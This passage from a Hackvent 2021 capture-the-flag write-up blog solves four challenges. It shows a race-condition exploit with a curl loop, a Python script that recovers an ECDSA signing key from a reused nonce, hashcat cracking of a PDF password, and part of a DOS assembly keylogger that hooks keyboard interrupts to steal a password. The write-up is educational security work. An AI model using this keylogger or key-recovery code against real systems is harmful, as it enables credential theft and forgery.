Coins. Because he doesn&#8217;t trust any existing software to securely store his wallet, he asked one of his elves, &#8220;Mikitaka Hazekura&#8221;, to implement their own crypto vault using enterprise software design patterns, the latest technology and thorough unit tests. They&#8217;re so proud of it, they&#8217;ve decided to&nbsp;<a href=\"https:\/\/sigterm.ch\/stuff\/hv21\/95cd312c-cf84-4985-9fa3-da70985e39ed.zip\" target=\"_blank\" rel=\"noreferrer noopener\">open source it<\/a>!<\/p>\n\n\n\n<p>Santa requested to use multiple words, based off his favorite anime, instead of one long password to make it more memorable and secure at the same time.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Goal<\/h2>\n\n\n\n<p>Santa watched the newly released 6th part of his favorite anime and binge-watched it multiple times already. Unfortunately he can now no longer remember which characters he used to set up his wallet and can&#8217;t access his funds to buy the gifts for Christmas. Can you help Santa out?<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Hints<\/h2>\n\n\n\n<ul class=\"wp-block-list\">\n<li>No knowledge about&nbsp;<code>JoJo's Bizarre Adventure<\/code>&nbsp;is required to solve this challenge<\/li>\n\n\n\n<li>No extensive brute force or wordlist is required<\/li>\n<\/ul>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"922\" height=\"1024\" src=\"https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-31-922x1024.png\" alt=\"\" class=\"wp-image-1732\" srcset=\"https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-31-922x1024.png 922w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-31-270x300.png 270w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-31-768x853.png 768w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-31.png 1102w\" sizes=\"auto, (max-width: 922px) 100vw, 922px\" \/><\/figure>\n\n\n\n<h2 class=\"wp-block-heading\">Solution<\/h2>\n\n\n\n<p>We got the whole 
source code of the application. There are many hints which indicate that there is a race-condition in the application. E.g. the comment in the unit-test, the blocking of the concurrent requests and the button in the website which is disabled after submitting a request.<\/p>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"kotlin\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">package dev.honegger.hackvent2021.santacryptovault.controllers\nimport dev.honegger.hackvent2021.santacryptovault.services.VaultCode\nimport kotlinx.coroutines.*\nimport org.junit.jupiter.api.Assertions\nimport org.junit.jupiter.api.Disabled\nimport org.junit.jupiter.api.Test\nimport org.springframework.beans.factory.annotation.Autowired\nimport org.springframework.boot.test.context.SpringBootTest\nimport org.springframework.http.HttpStatus\nimport kotlin.time.Duration.Companion.milliseconds\n@SpringBootTest(\n    properties = [\n        \"vault.secret.bestCharacter=Correct_hash\",\n        \"vault.secret.bestWaifu=Correct_hash\",\n        \"vault.secret.reliableGuy=Correct_hash\",\n        \"vault.secret.bestStand=Correct_hash\",\n        \"vault.secret.bestVillain=Correct_hash\",\n    ]\n)\nclass VaultControllerTests {\n    @Autowired\n    lateinit var controller: VaultController\n    private val dummyCode = VaultCode(\n        bestCharacter = \"Dio\",\n        bestWaifu = \"Dio\",\n        reliableGuy = \"Dio\",\n        bestStand = \"Dio\",\n        bestVillain = \"Dio\",\n    )\n    @Test\n    fun `too many requests get blocked`() = runBlocking {\n        val firstRequests = listOf(\n            async { controller.check(dummyCode) },\n            async { controller.check(dummyCode) },\n        )\n        delay(100.milliseconds)\n        val additionalRequest = controller.check(dummyCode)\n        val results = firstRequests.awaitAll()\n        
results.forEach {\n            Assertions.assertEquals(\n                HttpStatus.FORBIDDEN,\n                it.statusCode\n            )\n        }\n        Assertions.assertEquals(\n            HttpStatus.TOO_MANY_REQUESTS,\n            additionalRequest.statusCode\n        )\n    }\n    @Test\n    @Disabled(\"TODO sometimes this test fails and a dummyCode passes, hopefully just a test issue\")\n    fun `parallel execution works`() = runBlocking {\n        listOf(\n            async { controller.check(dummyCode) },\n            \/\/ Hint: This delay needs to be adjusted based on computer speed if you want to run the test locally\n            async { delay(375.milliseconds); controller.check(dummyCode) },\n        ).map {\n            it.await()\n        }.forEach {\n            Assertions.assertEquals(\n                HttpStatus.FORBIDDEN,\n                it.statusCode\n            )\n        }\n    }\n}<\/pre>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"kotlin\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">package dev.honegger.hackvent2021.santacryptovault.controllers\nimport dev.honegger.hackvent2021.santacryptovault.services.WalletService\nimport dev.honegger.hackvent2021.santacryptovault.services.VaultCode\nimport dev.honegger.hackvent2021.santacryptovault.services.VaultService\nimport kotlinx.coroutines.*\nimport mu.KotlinLogging\nimport org.springframework.http.HttpStatus\nimport org.springframework.http.ResponseEntity\nimport org.springframework.web.bind.annotation.GetMapping\nimport org.springframework.web.bind.annotation.RestController\nimport java.util.concurrent.atomic.AtomicInteger\nimport kotlin.time.Duration.Companion.seconds\n\/**\n * Prevent evil DDOS or Brute-Force attacks\n *\/\nprivate const val maxConcurrentRequests = 2\n\/**\n * Prevent time based Brute-Force attacks\n *\/\nprivate val 
constRequestDuration = 2.seconds\nprivate val log = KotlinLogging.logger {  }\n@RestController\nclass VaultController(private val vaultService: VaultService, private val walletService: WalletService) {\n    private var activeRequests = AtomicInteger(0)\n    private val scope = CoroutineScope(Dispatchers.Default)\n    @GetMapping(\"\/check\")\n    suspend fun check(code: VaultCode): ResponseEntity&lt;String> {\n        return if (activeRequests.incrementAndGet() &lt;= maxConcurrentRequests) {\n            try {\n                log.info { \"Checking $code\" }\n                val delayTask = scope.async { delay(constRequestDuration) }\n                val codeTask = scope.async { vaultService.checkCode(code) }\n                val res = codeTask.await()\n                delayTask.await()\n                if (res) {\n                    ResponseEntity.ok(\"Correct code! Here's your crypto wallet: ${walletService.walletAddress}\")\n                } else {\n                    ResponseEntity.status(HttpStatus.FORBIDDEN).body(\"Wrong code!\")\n                }\n            } finally {\n                activeRequests.decrementAndGet()\n            }\n        } else {\n            activeRequests.decrementAndGet()\n            log.info { \"Blocked DDOS attack\" }\n            ResponseEntity.status(HttpStatus.TOO_MANY_REQUESTS).body(\"Too many parallel requests!\")\n        }\n    }\n}<\/pre>\n\n\n\n<p>I solved this task by entering the curl command in one terminal and running a bash loop in a second terminal. After 2-3 minutes I got the flag. 
<\/p>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"shell\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">while true; do curl \"https:\/\/b805c837-cac5-47b2-8aa4-a9fab4730ede.idocker.vuln.land\/check?bestCharacter=Dio&amp;bestWaifu=Dio&amp;reliableGuy=Dio&amp;bestStand=Dio&amp;bestVillain=Dio\"; done<\/pre>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" src=\"https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-68-1-1024x237.png\" alt=\"\" class=\"wp-image-1814\"\/><\/figure>\n\n\n\n<h2 class=\"wp-block-heading\">Flag<\/h2>\n\n\n\n<p>HV21{c0ncurrency_1s_a_b1tch}<\/p>\n\n\n\n<hr class=\"wp-block-separator has-css-opacity\"\/>\n\n\n\n<h1 class=\"wp-block-heading\">[HV21.17] Forging Santa&#8217;s Signature<\/h1>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"822\" height=\"118\" src=\"https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-32.png\" alt=\"\" class=\"wp-image-1733\" srcset=\"https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-32.png 822w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-32-300x43.png 300w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-32-768x110.png 768w\" sizes=\"auto, (max-width: 822px) 100vw, 822px\" \/><\/figure>\n\n\n\n<h2 class=\"wp-block-heading\">Thanks!<\/h2>\n\n\n\n<p>This challenge is brought to you by&nbsp;<em>ice<\/em>. It&#8217;s their signature dish!<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Introduction<\/h2>\n\n\n\n<p>Santa is out of town and the elves have to urgently sign for an order. What to do, what to do? 
Well, need to save Christmas, so forge Santa&#8217;s signature they shall!<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Goal<\/h2>\n\n\n\n<p>Can you help the elves help Santa help everyone?<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Hints<\/h2>\n\n\n\n<p>The message to be signed is hashed as follows:&nbsp;<code>int(sha512(content.encode('utf-8')).hexdigest(), 16)<\/code><\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"423\" src=\"https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-33-1024x423.png\" alt=\"\" class=\"wp-image-1734\" srcset=\"https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-33-1024x423.png 1024w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-33-300x124.png 300w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-33-768x317.png 768w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-33.png 1230w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<h2 class=\"wp-block-heading\">Solution<\/h2>\n\n\n\n<p>On the challenge website we can sign sample messages and execute commands if we can properly sign them.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" src=\"https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-70-1024x271.png\" alt=\"\" class=\"wp-image-1820\"\/><\/figure>\n\n\n\n<p>First, I googled for P-384 and came across the <a rel=\"noreferrer noopener\" href=\"https:\/\/en.wikipedia.org\/wiki\/Elliptic_Curve_Digital_Signature_Algorithm\" target=\"_blank\">ECDSA Signature Algorithm<\/a>. In my research I discovered that the bug\/problem used for this challenge was the reason that the <a rel=\"noreferrer noopener\" href=\"https:\/\/en.wikipedia.org\/wiki\/PlayStation_3_homebrew\" target=\"_blank\">PlayStation 3 was hacked by fail0verflow and geohot<\/a>. The problem arises when a poor random generator (or none at all) is used, so that the nonce always stays the same. 
I also stumbled across a <a rel=\"noreferrer noopener\" href=\"https:\/\/www.youtube.com\/watch?v=sYCzu04ftaY\" target=\"_blank\">video by LiveOverflow on YouTube<\/a>, who explains in detail how to solve this kind of CTF challenge. My solution is heavily based on that video.<\/p>\n\n\n\n<p>Because the nonce is the same, the two messages in the screenshot and their signatures are enough to recover the signing key and sign our own command to solve this challenge. The command &#8220;cat flag.txt&#8221; is used to read the content of the flag. Here is my script:<\/p>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"python\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">from hashlib import sha512\nfrom ecdsa.curves import NIST384p\nfrom ecdsa.numbertheory import inverse_mod\nfrom ecdsa import SigningKey\nfrom ecdsa.util import string_to_number, sigencode_strings\n# Sign a message with an explicitly chosen nonce and return (r, s) as integers\ndef get_signature(message, signing_key, nonce):\n    sigr, sig = signing_key.sign(message.encode('utf-8'), k=nonce, sigencode=sigencode_strings, hashfunc=sha512, allow_truncate=True)\n    return string_to_number(sigr), string_to_number(sig)\nn = NIST384p.order\n# Both sample signatures share the same r, i.e. the same nonce was used\nr1 = 5858732217639868639411386743809793774024746786952853845150182054444060335615795388004347925624921216402601780245474\ns1 = 24775390985096693628587027542033193722178956113964732633660589449938083762410321188008407598547182884719288898328927\nm1 = \"Sample 1\"\nz1 = int(sha512(m1.encode('utf-8')).hexdigest(), 16)\n# Truncate the 512-bit digest to the bit length of the curve order\nz1 = z1 >> (512 - int(NIST384p.order).bit_length())\nr2 = 5858732217639868639411386743809793774024746786952853845150182054444060335615795388004347925624921216402601780245474\ns2 = 2011626295771525712212976969583419665940885391604065641883244102761256044025895922113900869438754143591054921598902\nm2 = \"Sample 2\"\nz2 = 
int(sha512(m2.encode('utf-8')).hexdigest(), 16)\nz2 = z2 >> (512 - int(NIST384p.order).bit_length())\nk = (((z1 - z2) %n) * inverse_mod(s1 - s2, n)) %n\nprint(\"got k: \" + str(k))\ndA = ((((s1*k)%n) -z1) * inverse_mod(r1,n)) %n\nprint(\"got DA: \" + str(dA))\nsk = SigningKey.from_secret_exponent(dA,curve=NIST384p)\nprint(get_signature(\"cat flag.txt\", sk, k))<\/pre>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">$ python3 sol.py\ngot k: 1403827651692161146480849641683810706894875255817855607788378779847968599038129200139880981523307336790480705837853\ngot DA: 37359027294104166988040099919169160805154413368249661614739727606944143104440877050919128026845236700442103481261264\n(5858732217639868639411386743809793774024746786952853845150182054444060335615795388004347925624921216402601780245474, 19734950972302764859836649590795926779990380369758052552114472465653004798967695373456125244935806469449514350652879)\n<\/pre>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" src=\"https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-71-1024x157.png\" alt=\"\" class=\"wp-image-1821\"\/><\/figure>\n\n\n\n<h2 class=\"wp-block-heading\">Flag<\/h2>\n\n\n\n<p>HV21{what&#8217;s_in_a_nonce?}<\/p>\n\n\n\n<hr class=\"wp-block-separator has-css-opacity\"\/>\n\n\n\n<h1 class=\"wp-block-heading\">[HV21.18] Lost Password<\/h1>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"816\" height=\"122\" src=\"https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-34.png\" alt=\"\" class=\"wp-image-1735\" srcset=\"https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-34.png 816w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-34-300x45.png 300w, 
https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-34-768x115.png 768w\" sizes=\"auto, (max-width: 816px) 100vw, 816px\" \/><\/figure>\n\n\n\n<h2 class=\"wp-block-heading\">Thanks!<\/h2>\n\n\n\n<p>This challenge is brought to you by&nbsp;<em>monkey<\/em>. Running a very tight ship \ud83d\ude09<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Introduction<\/h2>\n\n\n\n<p>Santa is getting a bit cross with Snowball the elf&#8230;<\/p>\n\n\n\n<blockquote class=\"wp-block-quote is-layout-flow wp-block-quote-is-layout-flow\">\n<p><em><strong>SANTA<\/strong><\/em>: Let me get this straight. I asked you to encrypt all our PDF files to prevent our lists of names from getting into the wrong hands, right?<\/p>\n<\/blockquote>\n\n\n\n<blockquote class=\"wp-block-quote is-layout-flow wp-block-quote-is-layout-flow\">\n<p><em><strong>SNOWBALL<\/strong><\/em>: Right.<\/p>\n<\/blockquote>\n\n\n\n<blockquote class=\"wp-block-quote is-layout-flow wp-block-quote-is-layout-flow\">\n<p><em><strong>SANTA<\/strong><\/em>: And then I asked you to send me the password to these files so I can access them, yes?<\/p>\n<\/blockquote>\n\n\n\n<blockquote class=\"wp-block-quote is-layout-flow wp-block-quote-is-layout-flow\">\n<p><em><strong>SNOWBALL<\/strong><\/em>: Yes.<\/p>\n<\/blockquote>\n\n\n\n<blockquote class=\"wp-block-quote is-layout-flow wp-block-quote-is-layout-flow\">\n<p><em><strong>SANTA<\/strong><\/em>: So you sent me the password in a PDF file.<\/p>\n<\/blockquote>\n\n\n\n<blockquote class=\"wp-block-quote is-layout-flow wp-block-quote-is-layout-flow\">\n<p><em><strong>SNOWBALL<\/strong><\/em>: A PDF, yes.<\/p>\n<\/blockquote>\n\n\n\n<blockquote class=\"wp-block-quote is-layout-flow wp-block-quote-is-layout-flow\">\n<p><em><strong>SANTA<\/strong><\/em>: Which was encrypted.<\/p>\n<\/blockquote>\n\n\n\n<blockquote class=\"wp-block-quote is-layout-flow wp-block-quote-is-layout-flow\">\n<p><em><strong>SNOWBALL<\/strong><\/em>: Yes. As per your instructions. 
We don&#8217;t want the password to get into the wrong hands, do we?<\/p>\n<\/blockquote>\n\n\n\n<blockquote class=\"wp-block-quote is-layout-flow wp-block-quote-is-layout-flow\">\n<p><em><strong>SANTA<\/strong><\/em>: But I can&#8217;t open this password file without knowing what the password is, can I? Could you please just write it down for me? You&nbsp;<em>do<\/em>&nbsp;remember it, don&#8217;t you?<\/p>\n<\/blockquote>\n\n\n\n<blockquote class=\"wp-block-quote is-layout-flow wp-block-quote-is-layout-flow\">\n<p><em><strong>SNOWBALL<\/strong><\/em>: Umm&#8230;.<\/p>\n<\/blockquote>\n\n\n\n<blockquote class=\"wp-block-quote is-layout-flow wp-block-quote-is-layout-flow\">\n<p><em><strong>SANTA<\/strong><\/em>: Snowball! Don&#8217;t tell me you forgot the password!<\/p>\n<\/blockquote>\n\n\n\n<p>Uh-oh. It&#8217;s starting to look like Christmas is ruined. Is there anything you can do to retrieve the password from&nbsp;<a href=\"https:\/\/sigterm.ch\/stuff\/hv21\/32306570-b1cb-4f99-a036-5242e1670dee.pdf\" target=\"_blank\" rel=\"noreferrer noopener\">this file<\/a>?<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Flag-Format:&nbsp;<code>HV{__________}<\/code><\/h2>\n\n\n\n<h2 class=\"wp-block-heading\">Solution<\/h2>\n\n\n\n<p>Another very resource-intensive challenge&#8230; I used the tools and information from <a rel=\"noreferrer noopener\" href=\"https:\/\/blog.didierstevens.com\/2017\/12\/26\/cracking-encrypted-pdfs-part-1\/\" target=\"_blank\">Didier Stevens<\/a> to solve this challenge.<\/p>\n\n\n\n<p>Step 1 &#8211; Analyze the PDF<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" src=\"https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-72-1-1024x633.png\" alt=\"\" class=\"wp-image-1826\"\/><\/figure>\n\n\n\n<p>The file is a PDF of version 1.6 and contains 27 different objects. 
Let&#8217;s take a closer look at the objects with pdf-parser.py and see if we find anything of interest:<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" src=\"https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-73-1024x543.png\" alt=\"\" class=\"wp-image-1827\"\/><\/figure>\n\n\n\n<p>The file uses symmetric AES encryption with 128 bits&#8230; That doesn&#8217;t sound like a password we can brute-force. One object in the PDF is suspicious, though, namely the font object:<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" src=\"https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-74-1024x299.png\" alt=\"\" class=\"wp-image-1828\"\/><\/figure>\n\n\n\n<p>If we look at the widths and map the array to the characters in the alphabet, we can assume that characters with a width of 0 are non-existent. That leaves us with a limited character set for the password:<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">#\/6EHQRVgjwx{}<\/pre>\n\n\n\n<p>According to the hint, the format of the flag and of the password is &#8220;<code>HV{__________}<\/code>&#8221;. There are 10 characters between the braces {}. I assumed that the characters HV{} are only used for the outer part of the flag &#8220;HV{}&#8221; and removed them from the character set. I stored the final character set in the file charset.txt.<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">#\/6EQRgjwx<\/pre>\n\n\n\n<p>With all this information, brute-forcing the password becomes feasible. It still took ages to compute on my laptop, though. To be precise, it took me 5 hours and 35 minutes! 
<\/p>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"shell\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">$ hashcat -m 10500 -a 3 -i doc.hash -1 charset.txt HV{?1?1?1?1?1?1?1?1?1?1} --force --increment-min=14<\/pre>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" src=\"https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/hashcat-1024x264.png\" alt=\"\" class=\"wp-image-1829\"\/><\/figure>\n\n\n\n<p>With the password &#8220;HV{E6wRx#jQ\/g}&#8221; we can open the PDF and get the confirmation that the password is also our flag. <\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" src=\"https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-75-717x1024.png\" alt=\"\" class=\"wp-image-1830\"\/><\/figure>\n\n\n\n<h2 class=\"wp-block-heading\">Flag<\/h2>\n\n\n\n<p>HV{E6wRx#jQ\/g}<\/p>\n\n\n\n<hr class=\"wp-block-separator has-css-opacity\"\/>\n\n\n\n<h1 class=\"wp-block-heading\">[HV21.19] Santa&#8217;s Trusty System<\/h1>\n\n\n\n<figure class=\"wp-block-image size-full\"><img decoding=\"async\" src=\"https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-35-1.png\" alt=\"\" class=\"wp-image-1736\"\/><\/figure>\n\n\n\n<h2 class=\"wp-block-heading\">Thanks!<\/h2>\n\n\n\n<p>This challenge is brought to you by&nbsp;<em>darkstar<\/em>. All hail stability!<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Introduction<\/h2>\n\n\n\n<p>Santa has been using his trusty system for more than a quarter of a century and his elves think the software is far too old and insecure. They&#8217;re asking you to have a look at&nbsp;<a href=\"https:\/\/sigterm.ch\/stuff\/hv21\/f9be3353-cbe3-4b95-a8ec-da37129f170a.zip\" target=\"_blank\" rel=\"noreferrer noopener\">the software<\/a>. They&#8217;d also be willing to swap one of the disks if you provide an updated version. 
You&#8217;ll of course get it back as soon as they&#8217;ve done a quick sanity test on Santa&#8217;s system.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Goal<\/h2>\n\n\n\n<p>Can you please take a look at the software and see if it&#8217;s secure?<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Solution<\/h2>\n\n\n\n<p>I couldn&#8217;t have solved this challenge without the help of &#8220;ice&#8221;. I understood what needed to be done in the challenge, but struggled with the assembly part. Therefore, the assembly code is mainly his. Thanks a lot for the support.<\/p>\n\n\n\n<p>The challenge provides this website:<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" src=\"https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-36-1024x453.png\" alt=\"\" class=\"wp-image-1737\"\/><\/figure>\n\n\n\n<p>Moreover, we have two image files, fda.img and fdb.img, together with a run.sh script to run them in QEMU.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" src=\"https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-77-1024x655.png\" alt=\"\" class=\"wp-image-1834\"\/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" src=\"https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-78-1024x233.png\" alt=\"\" class=\"wp-image-1835\"\/><\/figure>\n\n\n\n<p>Let&#8217;s mount the fda.img image locally and see what it contains. 
<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" src=\"https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-76-1024x454.png\" alt=\"\" class=\"wp-image-1833\"\/><\/figure>\n\n\n\n<p>Together with the website of the challenge, we can figure out what is needed to solve this:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>AUTOEXEC.BAT loads b:\\init.bat, which is under our control<\/li>\n\n\n\n<li>We can upload fdb.img to the website with an init.bat that loads our own program, which will be executed before hv21.exe<\/li>\n\n\n\n<li>If we are able to write output to b:\\ and the checksum of fdb.img changes after execution, we can download the image.<\/li>\n<\/ul>\n\n\n\n<p>From my perspective, there are two ways to solve the challenge. 1) Write a keylogger for MS-DOS which saves the keystrokes to b:\\ and load it in the init.bat file. 2) Patch the HV21.exe file to save the keystrokes\/password to b:\\ and replace the original HV21.exe via the init.bat file. I went for solution number one.<\/p>\n\n\n\n<h3 class=\"wp-block-heading\">Step 1 &#8211; ASM keylogger<\/h3>\n\n\n\n<p>Thanks to ice I could create the following keylogger in assembly, which is based on this source code: <a href=\"https:\/\/github.com\/MrMichael2002\/Keylogger-scan-codes\/blob\/master\/KEYS.ASM\" target=\"_blank\" rel=\"noreferrer noopener\">https:\/\/github.com\/MrMichael2002\/Keylogger-scan-codes\/blob\/master\/KEYS.ASM <\/a><\/p>\n\n\n\n<p>HV21.exe registers its own routine for interrupt 09h, so we need to account for this in the assembly code; otherwise the keylogger will not work during the execution of hv21.exe and we won&#8217;t get the username &amp; password. 
<\/p>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"asm\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">.model tiny\n.code\n.386\norg 100h\nStart:\n\t\tjmp\treal_start\nedited\t\tdw\t0\nmagic\t\tdw\t0BABAh\nlogfile\t\tdb\t'b:\\output.txt', 0\nhandle\t\tdw\t0\nbuf\t\tdb\t320 dup (?)\nbufptr          dw\t0\nmust_write\tdb\t0\n;IRQ1 - KEYBOARD DATA READY\nnew_09h:\n\t\tpushf\n\t\tpusha\n\t\tpush\tes\n\t\tpush\tds\n\t\tpush\tcs\n\t\tpop\tds\t;Remember segments\n\t        cmp\tbufptr, 160\n\t\tjae\tcall_old_09\t;Check if buffer is overflown\n\t\tin\tal, 60h\n\t\t;cmp   \tal, 39h  \t;Don't remember Shift, Alt and Ctrl\n\t\t;ja    \tcall_old_09\n\t\t;cmp   \tal, 2Ah\n\t\t;je    \tcall_old_09\n\t\t;cmp   \tal, 36h\n\t\t;je    \tcall_old_09\n\t\tpush  \t0\n\t\tpop   \tes\n\t\tmov   \tah, byte ptr es:[417h]\n\t\ttest  \tah, 43h                 ;Check if both shifts and CapsLock pressed\n\t\tje    \tpk1\n\t\tadd   \tal, 80h\npk1:\n\t\tmov \tdi, bufptr\n      \tmov   \tbuf[di], al\n      \tinc   \tdi\n        mov   \tbufptr, di\n        mov   \tmust_write, 1\ncall_old_09:\n        \tcmp edited, 3\n            jb second\n            pop\tds\n            pop\tes\n            popa\n            popf\n            jmp\tdword ptr cs:[old_09_offset]\t;Jump to old int09 handler\nsecond:     pop\tds\n            pop\tes\n            popa\n            popf\n            jmp\tdword ptr cs:[hv_offset]        ;Jump to hv21.exe handler\nold_09_offset  dw ?\nold_09_segment dw ?\n;DOS IDLE INTERRUPT\nnew_28h:\n\t\tpushf\n\t\tpusha\n\t\tpush  \tes\n\t\tpush  \tds\n\t\tpush  \tcs\n\t\tpop   \tds\n\t\tcmp   \tmust_write, 1\n\t\tjne   \tcall_old_28\n\t\tcmp   \tbufptr, 160\n\t\tjb    \tcall_old_28\n\t\tmov   \tax, 3d01h\n\t\tlea   \tdx, logfile\n\t\tint   \t21h\n\t\tjc    \tcall_old_28\n\t\tmov   \thandle, ax\n\t\tmov   \tbx, ax\n\t\tmov   \tax, 
4202h\n\t\txor   \tcx, cx\n\t\txor   \tdx, dx\n\t\tint   \t21h\n\t\tjc    \tcall_old_28\n\t\tmov   \tah, 40h\n\t\tmov   \tbx, handle\n\t\tmov   \tcx, bufptr\n\t\tlea   \tdx, buf\n\t\tint   \t21h\n\t\tjc    \tcall_old_28\n\t\tmov   \tah, 3Eh\n\t\tmov   \tbx, handle\n\t\tint   \t21h\n\t\tjc    \tcall_old_28\n\t\tmov   \tmust_write, 0\n\t\tmov   \tbufptr, 0\ncall_old_28:\n\t\tpop\tds\n\t\tpop   \tes\n\t\tpopa\n\t\tpopf\n\t\tjmp\tdword ptr cs:[old_28_offset]\nold_28_offset  dw ?\nold_28_segment dw ?\nnew_21h:\n\t\tpushf\n\t\tpusha\n\t\tpush  \tes\n\t\tpush  \tds\n\t\tpush  \tcs\n\t\t;pop   \tds\n\t\tcmp\tax, 2509h\n\t\tjne    \tcall_old_21\n\t\tmov\tcs:hv_offset, dx\n\t\tmov\tcs:hv_segment, ds\n\t\tinc\tedited\n        \tpop     ds\n        \tpop     ds\n        \tpop     es\n        \tpopa\n        \tpopf\n        \tiret\ncall_old_21:\n\t\tpop     ds\n        \tpop     ds\n\t\tpop     es\n\t\tpopa\n\t\tpopf\n\t\tjmp     dword ptr cs:[old_21_offset]\nhv_offset\tdw ?\nhv_segment\tdw ?\nold_21_offset  dw ?\nold_21_segment dw ?\nreal_start:\n\t\tmov\tax, 3509h\t\t;Get old int09h address\n\t\tint   \t21h\n\t\tcmp   \tword ptr es:magic, 0BABAh ;Check if has been installed\n\t\tje    \talready_inst\n\t\tmov   \tcs:old_09_offset, bx    ;Remember old int09h handler\n\t\tmov   \tcs:old_09_segment, es\n\t\tmov   \tax, 2509h\t\t;Set new int09h handler\n\t\tmov   \tdx, offset new_09h\n\t\tint   \t21h\n\t\tmov   \tax, 3528h               ;Get old 28h handler\n\t\tint   \t21h\n\t\tmov   \tcs:old_28_offset, bx\n\t\tmov   \tcs:old_28_segment, es\n\t\tmov   \tax, 2528h\t\t;Set new 28h handler\n\t\tmov   \tdx, 